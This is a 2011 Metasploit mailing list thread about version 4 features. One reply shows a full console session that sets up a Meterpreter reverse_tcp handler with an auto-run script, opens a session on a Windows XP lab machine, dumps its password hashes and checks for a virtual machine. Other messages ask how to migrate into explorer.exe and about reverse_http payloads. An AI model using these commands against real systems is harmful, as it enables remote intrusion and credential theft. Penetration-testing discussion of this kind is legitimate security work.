Metasploit mailing list archives
Re: News from Metasploit 4.
From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 14:47:32 -0500
Hi Carlos, It really works very well, big thanks. I noted that migrate on metasploit4 do not work without the pid. I tried pass the name explorer.exe but it doesn't work. Do you know some workaround? I found this idea http://blog.invisibledenizen.org/2008/12/automatic-migration-to-new-process-with.html But it execute a new cmd, I don't want to create a new process, I would like to just move to the existent explorer.exe, do you know any script or trick for this? Also, when you call screenshot your Linux automatic display lynx too? Any way to avoid it? Thanks and keep the good work. On Sat, Aug 27, 2011 at 2:15 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
Hi Carlos I followed your step by step and it worked, I'm really a foul. Thanks a lot. By the way do you know if there is reverse_http(s) for windows 64 bits? Thanks, really thanks. On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:works for me msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.100 LHOST => 192.168.1.100 msf exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc AutoRunScript => multi_console_command -rc /tmp/sample.rc msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > exploit -x -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.100:4444 [*] Starting the payload handler... msf exploit(handler) > cat /tmp/sample.rc [*] exec: cat /tmp/sample.rc sysinfo getuid load priv hashdump run checkvm msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.115 [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400 [*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc' [*] Running Command List ... [*] Running command sysinfo Computer : CARLOS-192FCD91 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 [*] Running command getuid Server username: CARLOS-192FCD91\Administrator [*] Running command load priv [-] The 'priv' extension has already been loaded. [*] Running command hashdump Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392::: HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e::: [*] Running command run checkvm [*] Checking if target is a Virtual Machine ..... [*] This is a VMware Virtual Machine On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:Hi HD Moore, Thanks for links. Does the new reverse_http works in 64 bit Windows? How should I call it? Any follow-up on the other 2 questions on the e-mail? Thanks On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:The Metasploit blog includes quite a bit of information on 4.0: https://community.rapid7.com/community/metasploit?view=blog You can also see the release notes: https://community.rapid7.com/docs/DOC-1496 _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- News from Metasploit 4. Richard Miles (Aug 25)
- Re: News from Metasploit 4. Patrick Webster (Aug 25)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Re: News from Metasploit 4. egypt (Aug 26)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Re: News from Metasploit 4. Patrick Webster (Aug 25)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Carlos Perez (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 27)